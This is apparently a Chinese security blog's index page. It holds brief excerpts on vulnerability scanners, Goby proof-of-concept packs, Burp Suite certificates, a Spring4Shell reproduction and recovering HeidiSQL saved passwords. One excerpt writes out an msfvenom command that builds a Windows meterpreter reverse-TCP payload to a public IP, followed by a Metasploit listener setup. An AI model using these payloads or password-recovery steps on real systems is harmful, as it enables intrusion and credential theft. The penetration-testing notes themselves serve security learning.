the苍穹

摘要： Mac 使用Xray漏扫工具 1.进入xray官方网站 https://stack.chaitin.com/ 选择xray工具进入 2.选择下载版本 Mac 就下载darwin M1芯片的下载arm64 3.下载之后进行解压 发现得到一个单个文件 4. 先简单运行一下 提示说没有配置文件。 5.但是 阅读全文

摘要： goby漏洞扫描工具POC扩展 推荐一个github上的goby poc，默认goby通用poc只有300来个，最新版的也只有326个。 包含447个自定义goby-poc，是否含有后门和重复自行判断，如果无红队版，可直接poc管理处导入自定义poc即可，共计745个。 下载地址为： https:/ 阅读全文

摘要： 如图 出现中文的提示时是乱码 解决方法： 1.在时间和语言界面设置里选择语言和区域，下面的相关设置进行管理语言设置。 2.更改为中文，默认是英语。 3. 更改之后需要重启一下就好了。 阅读全文

摘要： 1.冰红茶安全分享 2.网安攻防知识库 3.安全洞察知识图谱 4.起源实验室 5.网络安全攻防wiki 6.hackingclub 阅读全文

摘要： 如何删除BP(burpsuite)证书 1.在终端中输入mmc 打开控制台。 2.在控制台中点击 文件>添加/删除管理单元 3. 找到证书进行添加 4. 不清楚具体哪个账户的话 可以把我的用户账户和计算机账户都添加上。 5.这时就会显示出刚刚添加的证书。 6.点击证书>查找证书,进行搜索bp证书 7 阅读全文

摘要： Spring Framework 远程命令执行漏洞复现(CVE-2022-22965) 漏洞描述： Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包，是一个包含Spring框架基本的核心工具包，Spring其他组件都要使用到这个包。 未经身份验证的 阅读全文

摘要： 获取heidisql保存的密码 1.heidsql 默认保存的密码忘记了，如何找回？ 如下图所示！ 2.连接进入数据库，导出配置文件。 3. 使用下列python代码 运行 import re settings = r"D:\123.txt" #配置文件保存的位置 with open(setting 阅读全文

摘要： 记录 1.生成简单的 exe文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=公网ip LPORT=8888 -f exe > a.exe 2.打开msf msfconsole 3.设置监听 use exploit/multi/handler 阅读全文

摘要： BP（burpsuite）测试不安全的HTTP请求 启用了不安全的HTTP方法，可能会导致攻击者非授权在Web 服务器上上传、修改或删除Web 页面、脚本和文件等。 使用curl测试： curl -v -X OPTIONS http://www.example.com/test/ 查看响应的 All 阅读全文

摘要： BIGip是对负载均衡的实现，主要通过Virtual Server、iRules、Pool、Node、Monitor和Persistent（会话保持）实现。BIGip在实现会话保持机制时会在用户首次发起请求时，会为用户设置一个cookie，即服务端会添加set-cookie响应头头（比如：Set-C 阅读全文